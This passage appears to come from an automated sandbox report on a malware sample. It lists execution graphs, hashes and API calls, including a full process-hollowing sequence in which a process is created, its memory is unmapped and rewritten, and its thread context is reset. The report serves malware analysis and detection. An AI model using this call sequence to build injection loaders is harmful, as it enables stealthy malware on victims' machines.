                                                                                                                                                                      • Opcode Fuzzy Hash: 9c5c336ed9f01159b359a7e71459e17f731cec5e66911555df6e4c34a555c4e4
                                                                                                                                                                      • Instruction Fuzzy Hash: 6CB048B8900200CB8754BF25AC080043BE0B2083023C1A6B5E42586220E73842028F28
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:42.6%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:86.4%
                                                                                                                                                                      Signature Coverage:25%
                                                                                                                                                                      Total number of Nodes:44
                                                                                                                                                                      Total number of Limit Nodes:8
                                                                                                                                                                      execution_graph 431 2735026 432 2735035 431->432 435 27357c6 432->435 440 27357e1 435->440 436 27357ea CreateToolhelp32Snapshot 437 2735806 Module32First 436->437 436->440 438 2735815 437->438 439 273503e 437->439 442 2735485 438->442 440->436 440->437 443 27354b0 442->443 444 27354c1 VirtualAlloc 443->444 445 27354f9 443->445 444->445 445->445 480 401ed8 483 404b5c 480->483 482 401edd 482->482 484 404b81 483->484 485 404b8e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 483->485 484->485 486 404b85 484->486 485->486 486->482 446 28f0000 449 28f0630 446->449 448 28f0005 450 28f064c 449->450 452 28f1577 450->452 455 28f05b0 452->455 459 28f05dc 455->459 456 28f061e 457 28f05e2 GetFileAttributesA 457->459 459->456 459->457 460 28f0420 459->460 461 28f04f3 460->461 462 28f04ff CreateWindowExA 461->462 463 28f04fa 461->463 462->463 464 28f0540 PostMessageA 462->464 463->459 465 28f055f 464->465 465->463 467 28f0110 VirtualAlloc GetModuleFileNameA 465->467 468 28f0414 467->468 469 28f017d CreateProcessA 467->469 468->465 469->468 471 28f025f VirtualFree VirtualAlloc Wow64GetThreadContext 469->471 471->468 472 28f02a9 ReadProcessMemory 471->472 473 28f02e5 VirtualAllocEx NtWriteVirtualMemory 472->473 474 28f02d5 NtUnmapViewOfSection 472->474 475 28f033b 473->475 474->473 476 28f039d WriteProcessMemory Wow64SetThreadContext ResumeThread 475->476 477 28f0350 NtWriteVirtualMemory 475->477 478 28f03fb ExitProcess 476->478 477->475

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 028F0156
                                                                                                                                                                      • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 028F016C
                                                                                                                                                                      • CreateProcessA.KERNELBASE(?,00000000), ref: 028F0255
                                                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 028F0270
                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 028F0283
                                                                                                                                                                      • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 028F029F
                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 028F02C8
                                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 028F02E3
                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 028F0304
                                                                                                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 028F032A
                                                                                                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 028F0399
                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 028F03BF
                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 028F03E1
                                                                                                                                                                      • ResumeThread.KERNELBASE(00000000), ref: 028F03ED
                                                                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 028F0412
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.2101776006.00000000028F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_13_2_28f0000_4577.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 93872480-0
                                                                                                                                                                      • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                                      • Instruction ID: 0995d5bc259647b16306fc3b51a89c8512aa27a480c54ce417386f4da38e1d45
                                                                                                                                                                      • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                                      • Instruction Fuzzy Hash: 3FB1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E649AB395D771AE41CF94
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 15 28f0420-28f04f8 17 28f04ff-28f053c CreateWindowExA 15->17 18 28f04fa 15->18 20 28f053e 17->20 21 28f0540-28f0558 PostMessageA 17->21 19 28f05aa-28f05ad 18->19 20->19 22 28f055f-28f0563 21->22 22->19 23 28f0565-28f0579 22->23 23->19 25 28f057b-28f0582 23->25 26 28f05a8 25->26 27 28f0584-28f0588 25->27 26->22 27->26 28 28f058a-28f0591 27->28 28->26 29 28f0593-28f0597 call 28f0110 28->29 31 28f059c-28f05a5 29->31 31->26
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 028F0533
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.2101776006.00000000028F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_13_2_28f0000_4577.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateWindow
                                                                                                                                                                      • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                                                                                      • API String ID: 716092398-2341455598
                                                                                                                                                                      • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                      • Instruction ID: f92a56f1f9b0b043daec214c843fa475013b6f29fdea26c4875b41ef8b039a25
                                                                                                                                                                      • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                                      • Instruction Fuzzy Hash: 94511674D08388DEEB11CBE8C849B9DBFB2AF15708F144058D5487F28AC3FA5659CB62
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 32 28f05b0-28f05d5 33 28f05dc-28f05e0 32->33 34 28f061e-28f0621 33->34 35 28f05e2-28f05f5 GetFileAttributesA 33->35 36 28f05f7-28f05fe 35->36 37 28f0613-28f061c 35->37 36->37 38 28f0600-28f060b call 28f0420 36->38 37->33 40 28f0610 38->40 40->37
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(apfHQ), ref: 028F05EC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.2101776006.00000000028F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_13_2_28f0000_4577.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                      • String ID: apfHQ$o
                                                                                                                                                                      • API String ID: 3188754299-2999369273
                                                                                                                                                                      • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                      • Instruction ID: 5296ff493b0f0a87aa8c3d34dc0cd8604aae5552494debb21b4e8d4d7242c23e
                                                                                                                                                                      • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                                      • Instruction Fuzzy Hash: 18012174C0425CEEDF50DBD8C5183AEBFB5AF41309F1480D9C5096B242D7BA9B59CBA2
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 41 27357c6-27357df 42 27357e1-27357e3 41->42 43 27357e5 42->43 44 27357ea-27357f6 CreateToolhelp32Snapshot 42->44 43->44 45 2735806-2735813 Module32First 44->45 46 27357f8-27357fe 44->46 47 2735815-2735816 call 2735485 45->47 48 273581c-2735824 45->48 46->45 52 2735800-2735804 46->52 53 273581b 47->53 52->42 52->45 53->48
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 027357EE
                                                                                                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 0273580E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.2101613794.0000000002735000.00000040.00000020.00020000.00000000.sdmp, Offset: 02735000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_13_2_2735000_4577.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3833638111-0
                                                                                                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                      • Instruction ID: d90a79ac6eb36619a79e50cdf626625d6e281476d8afb1ab46106288ae84591d
                                                                                                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                      • Instruction Fuzzy Hash: 7AF09631200711BFD7213FF5A88DBAE76E8AF4D625F500528E642920C1DB70E8454B61
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 54 2735485-27354bf call 2735798 57 27354c1-27354f4 VirtualAlloc call 2735512 54->57 58 273550d 54->58 60 27354f9-273550b 57->60 58->58 60->58
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 027354D6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.2101613794.0000000002735000.00000040.00000020.00020000.00000000.sdmp, Offset: 02735000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_13_2_2735000_4577.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                      • Instruction ID: 73c50178e86a179e412f3e0de940df2d41f8f4b522dc44f1fb4bd48fcceb9410
                                                                                                                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                      • Instruction Fuzzy Hash: 3C113C79A00208EFDB01DF98C985E99BFF5AF08350F458094F9489B362D371EA90DF90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:3.9%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                      Signature Coverage:1.1%
                                                                                                                                                                      Total number of Nodes:1870
                                                                                                                                                                      Total number of Limit Nodes:54
                                                                                                                                                                      execution_graph 94516 7ff73d099650 94517 7ff73d04e318 94516->94517 94518 7ff73d09965c 94516->94518 94519 7ff73d0ac054 15 API calls 94518->94519 94519->94517 92385 7ff73d041a68 92386 7ff73d041a82 wcsftime 92385->92386 92401 7ff73d0477c4 92386->92401 92388 7ff73d041a90 92389 7ff73d041b1c 92388->92389 92411 7ff73d042088 78 API calls 92388->92411 92391 7ff73d041a9f 92391->92389 92412 7ff73d041e6c 80 API calls Concurrency::wait 92391->92412 92393 7ff73d041aac 92393->92389 92394 7ff73d041ab4 GetFullPathNameW 92393->92394 92413 7ff73d045f44 92394->92413 92396 7ff73d041ae0 92397 7ff73d045f44 4 API calls 92396->92397 92398 7ff73d041af4 92397->92398 92399 7ff73d08a17a wcscat 92398->92399 92400 7ff73d045f44 4 API calls 92398->92400 92400->92389 92402 7ff73d0477f2 92401->92402 92403 7ff73d04791d 92401->92403 92402->92403 92423 7ff73d0651a8 92402->92423 92403->92388 92405 7ff73d0651a8 4 API calls 92408 7ff73d0478ac 92405->92408 92408->92403 92429 7ff73d0480e0 92408->92429 92459 7ff73d0479d0 92408->92459 92463 7ff73d048790 92408->92463 92411->92391 92412->92393 92414 7ff73d08b6d2 92413->92414 92415 7ff73d045f5d 92413->92415 92513 7ff73d04ba94 92414->92513 92418 7ff73d045f74 92415->92418 92421 7ff73d045fa1 92415->92421 92417 7ff73d08b6dd 92508 7ff73d04610c 92418->92508 92420 7ff73d045f7f memcpy_s 92420->92396 92421->92417 92422 7ff73d0651a8 4 API calls 92421->92422 92422->92420 92428 7ff73d06516c 92423->92428 92424 7ff73d047821 92424->92405 92428->92423 92428->92424 92467 7ff73d0697ec EnterCriticalSection LeaveCriticalSection fread_s 92428->92467 92468 7ff73d065b48 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 92428->92468 92469 7ff73d065b68 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 92428->92469 92470 7ff73d047978 92429->92470 92431 7ff73d048289 92432 7ff73d048790 4 API calls 92431->92432 92433 7ff73d0482a7 Concurrency::wait 92432->92433 92433->92408 92436 7ff73d08cbb5 92490 7ff73d0b8128 80 API calls 3 library calls 92436->92490 92437 7ff73d0489a4 4 API calls 92446 7ff73d048686 92437->92446 92439 7ff73d08cbe6 92491 7ff73d0b8128 80 API calls 3 library calls 92439->92491 92440 7ff73d048790 4 API calls 92454 7ff73d04812c 92440->92454 92441 7ff73d08cb9d 92489 7ff73d0b8128 80 API calls 3 library calls 92441->92489 92444 7ff73d08cb97 92444->92433 92452 7ff73d0486cb 92446->92452 92487 7ff73d048d80 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 92446->92487 92447 7ff73d08cbc6 92449 7ff73d048790 4 API calls 92447->92449 92449->92444 92450 7ff73d08cb31 92488 7ff73d0b8128 80 API calls 3 library calls 92450->92488 92452->92450 92453 7ff73d0651a8 4 API calls 92452->92453 92457 7ff73d08cac0 memcpy_s 92453->92457 92454->92431 92454->92436 92454->92439 92454->92440 92454->92441 92454->92452 92455 7ff73d04856c 92454->92455 92458 7ff73d0485a5 memcpy_s Concurrency::wait 92454->92458 92473 7ff73d0489a4 92454->92473 92477 7ff73d048ad8 92454->92477 92486 7ff73d048ed0 5 API calls memcpy_s 92454->92486 92455->92450 92456 7ff73d0651a8 4 API calls 92455->92456 92455->92457 92456->92458 92457->92450 92458->92437 92458->92452 92460 7ff73d0479f7 92459->92460 92462 7ff73d047a29 Concurrency::wait 92459->92462 92461 7ff73d0651a8 4 API calls 92460->92461 92460->92462 92461->92462 92462->92408 92464 7ff73d048847 92463->92464 92466 7ff73d0487b3 memcpy_s Concurrency::wait 92463->92466 92465 7ff73d0651a8 4 API calls 92464->92465 92465->92466 92466->92408 92467->92428 92469->92428 92471 7ff73d0651a8 4 API calls 92470->92471 92472 7ff73d0479a8 92471->92472 92472->92454 92474 7ff73d0489b8 92473->92474 92475 7ff73d0489ca 92473->92475 92474->92454 92476 7ff73d0651a8 4 API calls 92475->92476 92476->92474 92485 7ff73d048b18 92477->92485 92478 7ff73d0489a4 4 API calls 92478->92485 92479 7ff73d048bc9 92479->92454 92480 7ff73d048c9f 92493 7ff73d045624 92480->92493 92482 7ff73d048d80 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92482->92485 92483 7ff73d048bc1 92492 7ff73d06adc8 36 API calls _snwprintf 92483->92492 92485->92478 92485->92479 92485->92480 92485->92482 92485->92483 92486->92454 92487->92446 92488->92444 92489->92444 92490->92447 92491->92444 92492->92479 92494 7ff73d045648 92493->92494 92497 7ff73d08b49a 92493->92497 92495 7ff73d0456a0 92494->92495 92499 7ff73d08b4f4 memcpy_s 92494->92499 92503 7ff73d049608 92495->92503 92500 7ff73d0651a8 4 API calls 92497->92500 92498 7ff73d0456af memcpy_s 92498->92479 92501 7ff73d0651a8 4 API calls 92499->92501 92500->92499 92502 7ff73d08b568 memcpy_s 92501->92502 92504 7ff73d04961e memcpy_s Concurrency::wait 92503->92504 92505 7ff73d049629 92503->92505 92504->92498 92506 7ff73d0651a8 4 API calls 92505->92506 92507 7ff73d08d374 92505->92507 92506->92504 92509 7ff73d04612b 92508->92509 92511 7ff73d04613b Concurrency::wait 92508->92511 92509->92420 92510 7ff73d08b77a 92511->92510 92512 7ff73d0651a8 4 API calls 92511->92512 92512->92509 92514 7ff73d04bab7 memcpy_s 92513->92514 92515 7ff73d04ba99 92513->92515 92514->92417 92514->92514 92515->92514 92517 7ff73d0489fc 92515->92517 92519 7ff73d048a29 92517->92519 92521 7ff73d048a19 memcpy_s 92517->92521 92518 7ff73d08cc1a 92519->92518 92520 7ff73d0651a8 4 API calls 92519->92520 92520->92521 92521->92514 94520 7ff73d07534c 94521 7ff73d07536d 94520->94521 94522 7ff73d075382 94520->94522 94534 7ff73d07b734 15 API calls abort 94521->94534 94522->94521 94524 7ff73d075387 94522->94524 94533 7ff73d06e4e4 EnterCriticalSection 94524->94533 94525 7ff73d075372 94535 7ff73d07b614 31 API calls _invalid_parameter_noinfo 94525->94535 94528 7ff73d07538c 94529 7ff73d0754c8 57 API calls 94528->94529 94531 7ff73d07539d 94529->94531 94530 7ff73d07537d 94532 7ff73d06e4f0 fflush LeaveCriticalSection 94531->94532 94532->94530 94534->94525 94535->94530 92522 7ff73d050be7 92525 7ff73d04d2b0 92522->92525 92524 7ff73d050bfa 92526 7ff73d04d2ea 92525->92526 92527 7ff73d098ee0 92526->92527 92529 7ff73d098ea2 92526->92529 92530 7ff73d098e81 92526->92530 92558 7ff73d04d315 fread_s 92526->92558 92606 7ff73d0da074 208 API calls 3 library calls 92527->92606 92533 7ff73d098ec8 92529->92533 92604 7ff73d0dabb4 208 API calls 4 library calls 92529->92604 92532 7ff73d098e8b 92530->92532 92530->92558 92531 7ff73d06565c EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 92531->92558 92603 7ff73d0da640 208 API calls 92532->92603 92605 7ff73d0c44e8 78 API calls 3 library calls 92533->92605 92535 7ff73d04d8f1 92594 7ff73d061d1c 45 API calls 92535->92594 92541 7ff73d04d905 92541->92524 92542 7ff73d065454 34 API calls __scrt_initialize_thread_safe_statics 92542->92558 92544 7ff73d0655fc EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 92544->92558 92547 7ff73d04d801 92547->92524 92551 7ff73d061d1c 45 API calls 92551->92558 92552 7ff73d099101 92619 7ff73d0da4d0 78 API calls 92552->92619 92553 7ff73d04d70a 92553->92547 92620 7ff73d0c44e8 78 API calls 3 library calls 92553->92620 92558->92531 92558->92535 92558->92542 92558->92544 92558->92547 92558->92551 92558->92552 92558->92553 92561 7ff73d051c90 92558->92561 92582 7ff73d04da90 92558->92582 92593 7ff73d04ca8c 45 API calls 92558->92593 92595 7ff73d061cbc 45 API calls 92558->92595 92596 7ff73d043494 208 API calls 92558->92596 92597 7ff73d063bbc 92558->92597 92601 7ff73d063c40 78 API calls 92558->92601 92602 7ff73d063d58 208 API calls 92558->92602 92607 7ff73d0472b8 92558->92607 92610 7ff73d04c98c 92558->92610 92614 7ff73d0ab7f8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92558->92614 92615 7ff73d04609c 92558->92615 92571 7ff73d051cf0 Concurrency::wait 92561->92571 92562 7ff73d0655fc EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 92562->92571 92563 7ff73d09ed08 92677 7ff73d0c44e8 78 API calls 3 library calls 92563->92677 92565 7ff73d09ed1b 92565->92558 92566 7ff73d052b19 92572 7ff73d04609c 4 API calls 92566->92572 92577 7ff73d052b30 92566->92577 92567 7ff73d052aff 92567->92566 92574 7ff73d09e60e 92567->92574 92567->92577 92569 7ff73d051e4e Concurrency::wait 92569->92558 92570 7ff73d0530de 92573 7ff73d04609c 4 API calls 92570->92573 92571->92562 92571->92563 92571->92566 92571->92567 92571->92569 92571->92570 92575 7ff73d04609c 4 API calls 92571->92575 92579 7ff73d06565c EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 92571->92579 92580 7ff73d065454 34 API calls __scrt_initialize_thread_safe_statics 92571->92580 92581 7ff73d0472b8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92571->92581 92621 7ff73d053450 92571->92621 92676 7ff73d0c44e8 78 API calls 3 library calls 92571->92676 92572->92569 92573->92569 92576 7ff73d04609c 4 API calls 92574->92576 92575->92571 92576->92577 92577->92558 92579->92571 92580->92571 92581->92571 92583 7ff73d04dcfc 92582->92583 92584 7ff73d04daa7 92582->92584 92583->92558 92590 7ff73d04daea 92584->92590 93331 7ff73d06565c EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 92584->93331 92590->92558 92593->92558 92594->92541 92595->92558 92596->92558 92598 7ff73d063bd6 92597->92598 92599 7ff73d04c848 4 API calls 92598->92599 92600 7ff73d063be1 92599->92600 92600->92558 92601->92558 92602->92558 92603->92547 92604->92533 92605->92527 92606->92558 92608 7ff73d0651a8 4 API calls 92607->92608 92609 7ff73d0472db 92608->92609 92609->92558 92611 7ff73d04c9a1 92610->92611 92613 7ff73d04c9a7 92610->92613 92612 7ff73d04609c 4 API calls 92611->92612 92611->92613 92612->92613 92613->92558 92614->92558 92616 7ff73d0460aa 92615->92616 92617 7ff73d0460af 92615->92617 93332 7ff73d0460b8 92616->93332 92617->92558 92619->92553 92620->92553 92622 7ff73d05349d 92621->92622 92633 7ff73d05352b 92621->92633 92623 7ff73d0534a7 92622->92623 92632 7ff73d09f602 92622->92632 92627 7ff73d09f62a 92623->92627 92634 7ff73d0534b1 92623->92634 92624 7ff73d09f504 92682 7ff73d045aac 208 API calls 92624->92682 92625 7ff73d09f5f3 92683 7ff73d0c44e8 78 API calls 3 library calls 92625->92683 92630 7ff73d09f65d 92627->92630 92635 7ff73d09f641 92627->92635 92629 7ff73d051c90 208 API calls 92629->92633 92637 7ff73d09f692 92630->92637 92638 7ff73d09f669 92630->92638 92684 7ff73d0dc9d0 208 API calls 3 library calls 92632->92684 92633->92629 92639 7ff73d0536e7 92633->92639 92659 7ff73d09f402 Concurrency::wait 92633->92659 92661 7ff73d09f37f Concurrency::wait 92633->92661 92662 7ff73d053618 92633->92662 92671 7ff73d053682 Concurrency::wait 92633->92671 92636 7ff73d04609c 4 API calls 92634->92636 92674 7ff73d0534c9 Concurrency::wait 92634->92674 92685 7ff73d0c44e8 78 API calls 3 library calls 92635->92685 92636->92674 92687 7ff73d0d9dd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92637->92687 92686 7ff73d0dc9d0 208 API calls 3 library calls 92638->92686 92639->92571 92643 7ff73d09f906 92648 7ff73d09f945 92643->92648 92776 7ff73d0dc48c 62 API calls Concurrency::wait 92643->92776 92644 7ff73d09f69c 92649 7ff73d09f751 92644->92649 92665 7ff73d09f6bc 92644->92665 92653 7ff73d04c98c 4 API calls 92648->92653 92719 7ff73d0c1810 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92649->92719 92650 7ff73d04609c 4 API calls 92650->92674 92651 7ff73d09f8dd 92757 7ff73d04b1c0 92651->92757 92675 7ff73d05350e Concurrency::wait 92653->92675 92655 7ff73d09f91c 92658 7ff73d04b1c0 49 API calls 92655->92658 92656 7ff73d053676 92656->92671 92679 7ff73d0c44e8 78 API calls 3 library calls 92656->92679 92667 7ff73d09f926 92658->92667 92659->92624 92659->92625 92659->92675 92661->92675 92681 7ff73d0c44e8 78 API calls 3 library calls 92661->92681 92662->92656 92678 7ff73d0537f0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92662->92678 92664 7ff73d09f8e7 92664->92643 92666 7ff73d04c98c 4 API calls 92664->92666 92688 7ff73d054840 92665->92688 92666->92643 92667->92648 92670 7ff73d04c98c 4 API calls 92667->92670 92669 7ff73d0536a4 92669->92650 92669->92674 92669->92675 92670->92648 92671->92669 92671->92675 92680 7ff73d0c44e8 78 API calls 3 library calls 92671->92680 92672 7ff73d09f768 Concurrency::wait 92720 7ff73d04e630 92672->92720 92674->92643 92674->92675 92756 7ff73d0dc2cc 50 API calls 2 library calls 92674->92756 92675->92571 92676->92571 92677->92565 92678->92656 92679->92671 92680->92661 92681->92659 92682->92669 92683->92632 92684->92674 92685->92675 92686->92674 92687->92644 92706 7ff73d0548bb memcpy_s Concurrency::wait 92688->92706 92691 7ff73d054ec0 9 API calls 92691->92706 92693 7ff73d054dbd 92694 7ff73d04c98c 4 API calls 92693->92694 92696 7ff73d054dca 92694->92696 92695 7ff73d0c44e8 78 API calls 92695->92706 92902 7ff73d061bb8 208 API calls 92696->92902 92700 7ff73d0651a8 4 API calls 92700->92706 92701 7ff73d054df8 92903 7ff73d064dac RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92701->92903 92703 7ff73d054c95 Concurrency::wait 92703->92674 92704 7ff73d051c90 208 API calls 92704->92706 92705 7ff73d04609c 4 API calls 92705->92706 92706->92691 92706->92693 92706->92695 92706->92696 92706->92700 92706->92701 92706->92703 92706->92704 92706->92705 92777 7ff73d0df550 92706->92777 92781 7ff73d0dcf5c 92706->92781 92813 7ff73d0c7434 92706->92813 92820 7ff73d0d3b44 92706->92820 92838 7ff73d0d014c 92706->92838 92843 7ff73d0df0cc 92706->92843 92849 7ff73d0df914 92706->92849 92854 7ff73d0c74a4 92706->92854 92859 7ff73d063470 92706->92859 92875 7ff73d0d2008 92706->92875 92882 7ff73d0d456c 92706->92882 92886 7ff73d0d22a0 92706->92886 92895 7ff73d06565c EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 92706->92895 92896 7ff73d04c848 92706->92896 92901 7ff73d0655fc EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 92706->92901 92904 7ff73d0dbc5c 208 API calls Concurrency::wait 92706->92904 92905 7ff73d0d9ec4 50 API calls Concurrency::wait 92706->92905 92719->92672 93288 7ff73d04cef0 92720->93288 92723 7ff73d099867 93296 7ff73d0c44e8 78 API calls 3 library calls 92723->93296 92726 7ff73d04f243 92729 7ff73d0651a8 4 API calls 92726->92729 92728 7ff73d0998b9 92728->92723 92730 7ff73d099889 92728->92730 92732 7ff73d099936 92728->92732 92747 7ff73d04ec0c memcpy_s Concurrency::wait 92729->92747 93298 7ff73d0c44e8 78 API calls 3 library calls 92730->93298 93297 7ff73d061bb8 208 API calls 92732->93297 92735 7ff73d051c90 208 API calls 92753 7ff73d04e6a5 memcpy_s Concurrency::wait 92735->92753 92736 7ff73d0651a8 4 API calls 92736->92747 92737 7ff73d0b5494 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92737->92753 92739 7ff73d04609c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92739->92753 92740 7ff73d0c1050 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92740->92753 92745 7ff73d0472b8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92745->92753 92746 7ff73d04ee6c 92746->92674 92747->92736 92755 7ff73d04ecba Concurrency::wait 92747->92755 92749 7ff73d04c98c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92749->92753 92751 7ff73d04da90 45 API calls 92751->92753 92752 7ff73d099ffc 92752->92730 93321 7ff73d0c44e8 78 API calls 3 library calls 92752->93321 92753->92723 92753->92726 92753->92728 92753->92730 92753->92732 92753->92735 92753->92737 92753->92739 92753->92740 92753->92745 92753->92746 92753->92747 92753->92749 92753->92751 92753->92752 92754 7ff73d0651a8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 92753->92754 93295 7ff73d0c44e8 78 API calls 3 library calls 92753->93295 93299 7ff73d0b53e0 4 API calls 2 library calls 92753->93299 93300 7ff73d0d9ec4 50 API calls Concurrency::wait 92753->93300 93301 7ff73d0bee74 45 API calls 92753->93301 93302 7ff73d04d100 92753->93302 93314 